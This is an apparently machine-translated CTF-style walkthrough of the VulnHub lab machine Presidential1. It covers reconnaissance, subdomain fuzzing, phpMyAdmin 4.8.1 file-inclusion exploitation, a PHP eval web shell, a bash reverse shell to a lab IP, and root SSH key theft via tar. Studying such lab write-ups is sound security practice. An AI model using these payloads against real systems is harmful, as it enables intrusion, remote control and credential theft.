当前位置:网站首页>【vulnhub】presidential1
【vulnhub】presidential1
2022-07-07 00:20:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :vulnhub
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 7 month 6 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
Navigation assistant
- The host found
- Port scanning
- visit 80 port
- dirb Directory scanning
- nikto and whatweb To collect information
- dirsearch Scan the directory again
- Try to login with the obtained account and password ssh service
- cewl Crawl dictionary
- hydra Blast ssh
- Subdomain explosion
- Log in to the database
- john Crack the code
- Try to use admin Sign in ssh( Failure )
- phpmyadmin Vulnerability penetration
- Raise the right
Because the target plane is host-only Pattern
We will kali It's also set to host-only Pattern
The host found
arp-scan -l
If the host number is too large or too small, throw it away , Because it may be a gateway or something
So the target ip by 192.168.110.128
Port scanning
nmap -sV -p- 192.168.110.128
visit 80 port
See information about someone's name , You may need to use cwel
dirb Directory scanning
dirb http://192.168.110.128
assets Catalog , Let's take a look at
Website source code , See if you have scanned sensitive files , I didn't find any sensitive files
cgi-bin Catalog 403
nikto and whatweb To collect information
whatweb 192.168.110.128
nikto --url 192.168.110.128
Visit config.php, There is indeed this file , But it's empty
Then try whether it's a backup file config.phps 、config.php.bak
visit icons/README
All of a sudden dirb There was suspicion , Why are these files not scanned
dirsearch Scan the directory again
./dirsearch.py -u http://192.168.110.128
It does config.php.bak
Because I thought it would download automatically , I didn't check the source code
Get the account and password of the database
open about.html
Other sections cannot be accessed , Only HOME and ABOUT
So this page is a static page
Try to login with the obtained account and password ssh service
ssh -p 2082 [email protected]
I don't know what's going on
cewl Crawl dictionary
cewl http://192.168.110.128 -w dic0.txt
hydra Blast ssh
hydra -L dic0.txt -P dic0.txt ssh://192.168.110.128
Look at this error message , And above votebox Error message
It should require a key , Instead of using passwords directly
Subdomain explosion
There is no more information to use
Explode subdomains
But now we only have servers ip Address , There is no domain name
So the domain name of the website is votenow.local
change host file
vim /etc/hosts
192.168.110.128 votenow.local
Want to use gobuster、oneforall To blow up the subdomain , But they are not well configured
Use wfuzzwfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local
stay Prime1 Drone aircraft fuzz Parameters are used ,-w Specify a dictionary ,-H Specify the request header , --hw and --hc Is the result of removing the response to a specified length
Get a subdomain datasafe
write in hosts file
vim /etc/hosts
192.168.110.128 datasafe.votenow.local
Log in to the database
Log in with the obtained database account
Got it admin And password
john Crack the code
【Try to Hack】john Hash cracking tool
obtain admin The password for Stella
Try to use admin Sign in ssh( Failure )
ssh -p 2082 [email protected]
You really need a certificate
phpmyadmin Vulnerability penetration
Tell us the version number 4.8.1searchsploit phpmyadmin
cp /usr/share/exploitdb/exploits/php/webapps/50457.py /root
This RCE Of CVE I don't know how to use it
Follow others to use the file to include a copy
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) | php/webapps/44928.txt
searchsploit -x php/webapps/44928.txt
structure urlhttp://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d4qpkliuhiq1anqdkqgc8v10qnq5teq8
It reappears successfully
Now we can write a sentence, Trojan horse <?php eval($_GET["ant"]); ?>
select "<?php echo file_put_contents('/var/www/html/s.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsiYW50Il0pOyA/Pg=='));exit;?>"
There may be something wrong with finding this , Not even , Direct rebound shellcd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.110.129/1100 0>&1' > shell.sh
python -m SimpleHTTPServer 80
nc -lvvp 1100
perform sqlselect '<?php system("wget 192.168.110.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
Get an interactive shellpython -c 'import pty; pty.spawn("/bin/bash")'
Raise the right
su admin
tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082
end
边栏推荐
- Encryption algorithm - password security
- 【CVPR 2022】半监督目标检测:Dense Learning based Semi-Supervised Object Detection
- "Latex" Introduction to latex mathematical formula "suggestions collection"
- Geo data mining (III) enrichment analysis of go and KEGG using David database
- 准备好在CI/CD中自动化持续部署了吗?
- 三维扫描体数据的VTK体绘制程序设计
- C language input / output stream and file operation [II]
- 智能运维应用之道,告别企业数字化转型危机
- JWT signature does not match locally computed signature. JWT validity cannot be asserted and should
- DAY ONE
猜你喜欢
Pytest multi process / multi thread execution test case
Introduction au GPIO
Geo data mining (III) enrichment analysis of go and KEGG using David database
pytest多进程/多线程执行测试用例
[boutique] Pinia Persistence Based on the plug-in Pinia plugin persist
DAY SIX
37页数字乡村振兴智慧农业整体规划建设方案
JWT signature does not match locally computed signature. JWT validity cannot be asserted and should
自动化测试工具Katalon(Web)测试操作说明
AVL树到底是什么?
随机推荐
app通用功能測試用例
DAY TWO
PostgreSQL使用Pgpool-II实现读写分离+负载均衡
Introduction to GPIO
Compilation of kickstart file
2022 PMP project management examination agile knowledge points (9)
Quickly use various versions of PostgreSQL database in docker
AVL树到底是什么?
Google, Baidu and Yahoo are general search engines developed by Chinese companies_ Baidu search engine URL
C语言输入/输出流和文件操作【二】
【vulnhub】presidential1
37页数字乡村振兴智慧农业整体规划建设方案
MVC and MVVM
Leecode brushes questions to record interview questions 17.16 massagist
SQL的一种写法,匹配就更新,否则就是插入
Rider离线使用Nuget包的方法
DAY SIX
微信小程序uploadfile服务器,微信小程序之wx.uploadFile[通俗易懂]
Close unregistering application XXX with Eureka with status down after Eureka client starts
Leecode brush question record sword finger offer 56 - ii Number of occurrences of numbers in the array II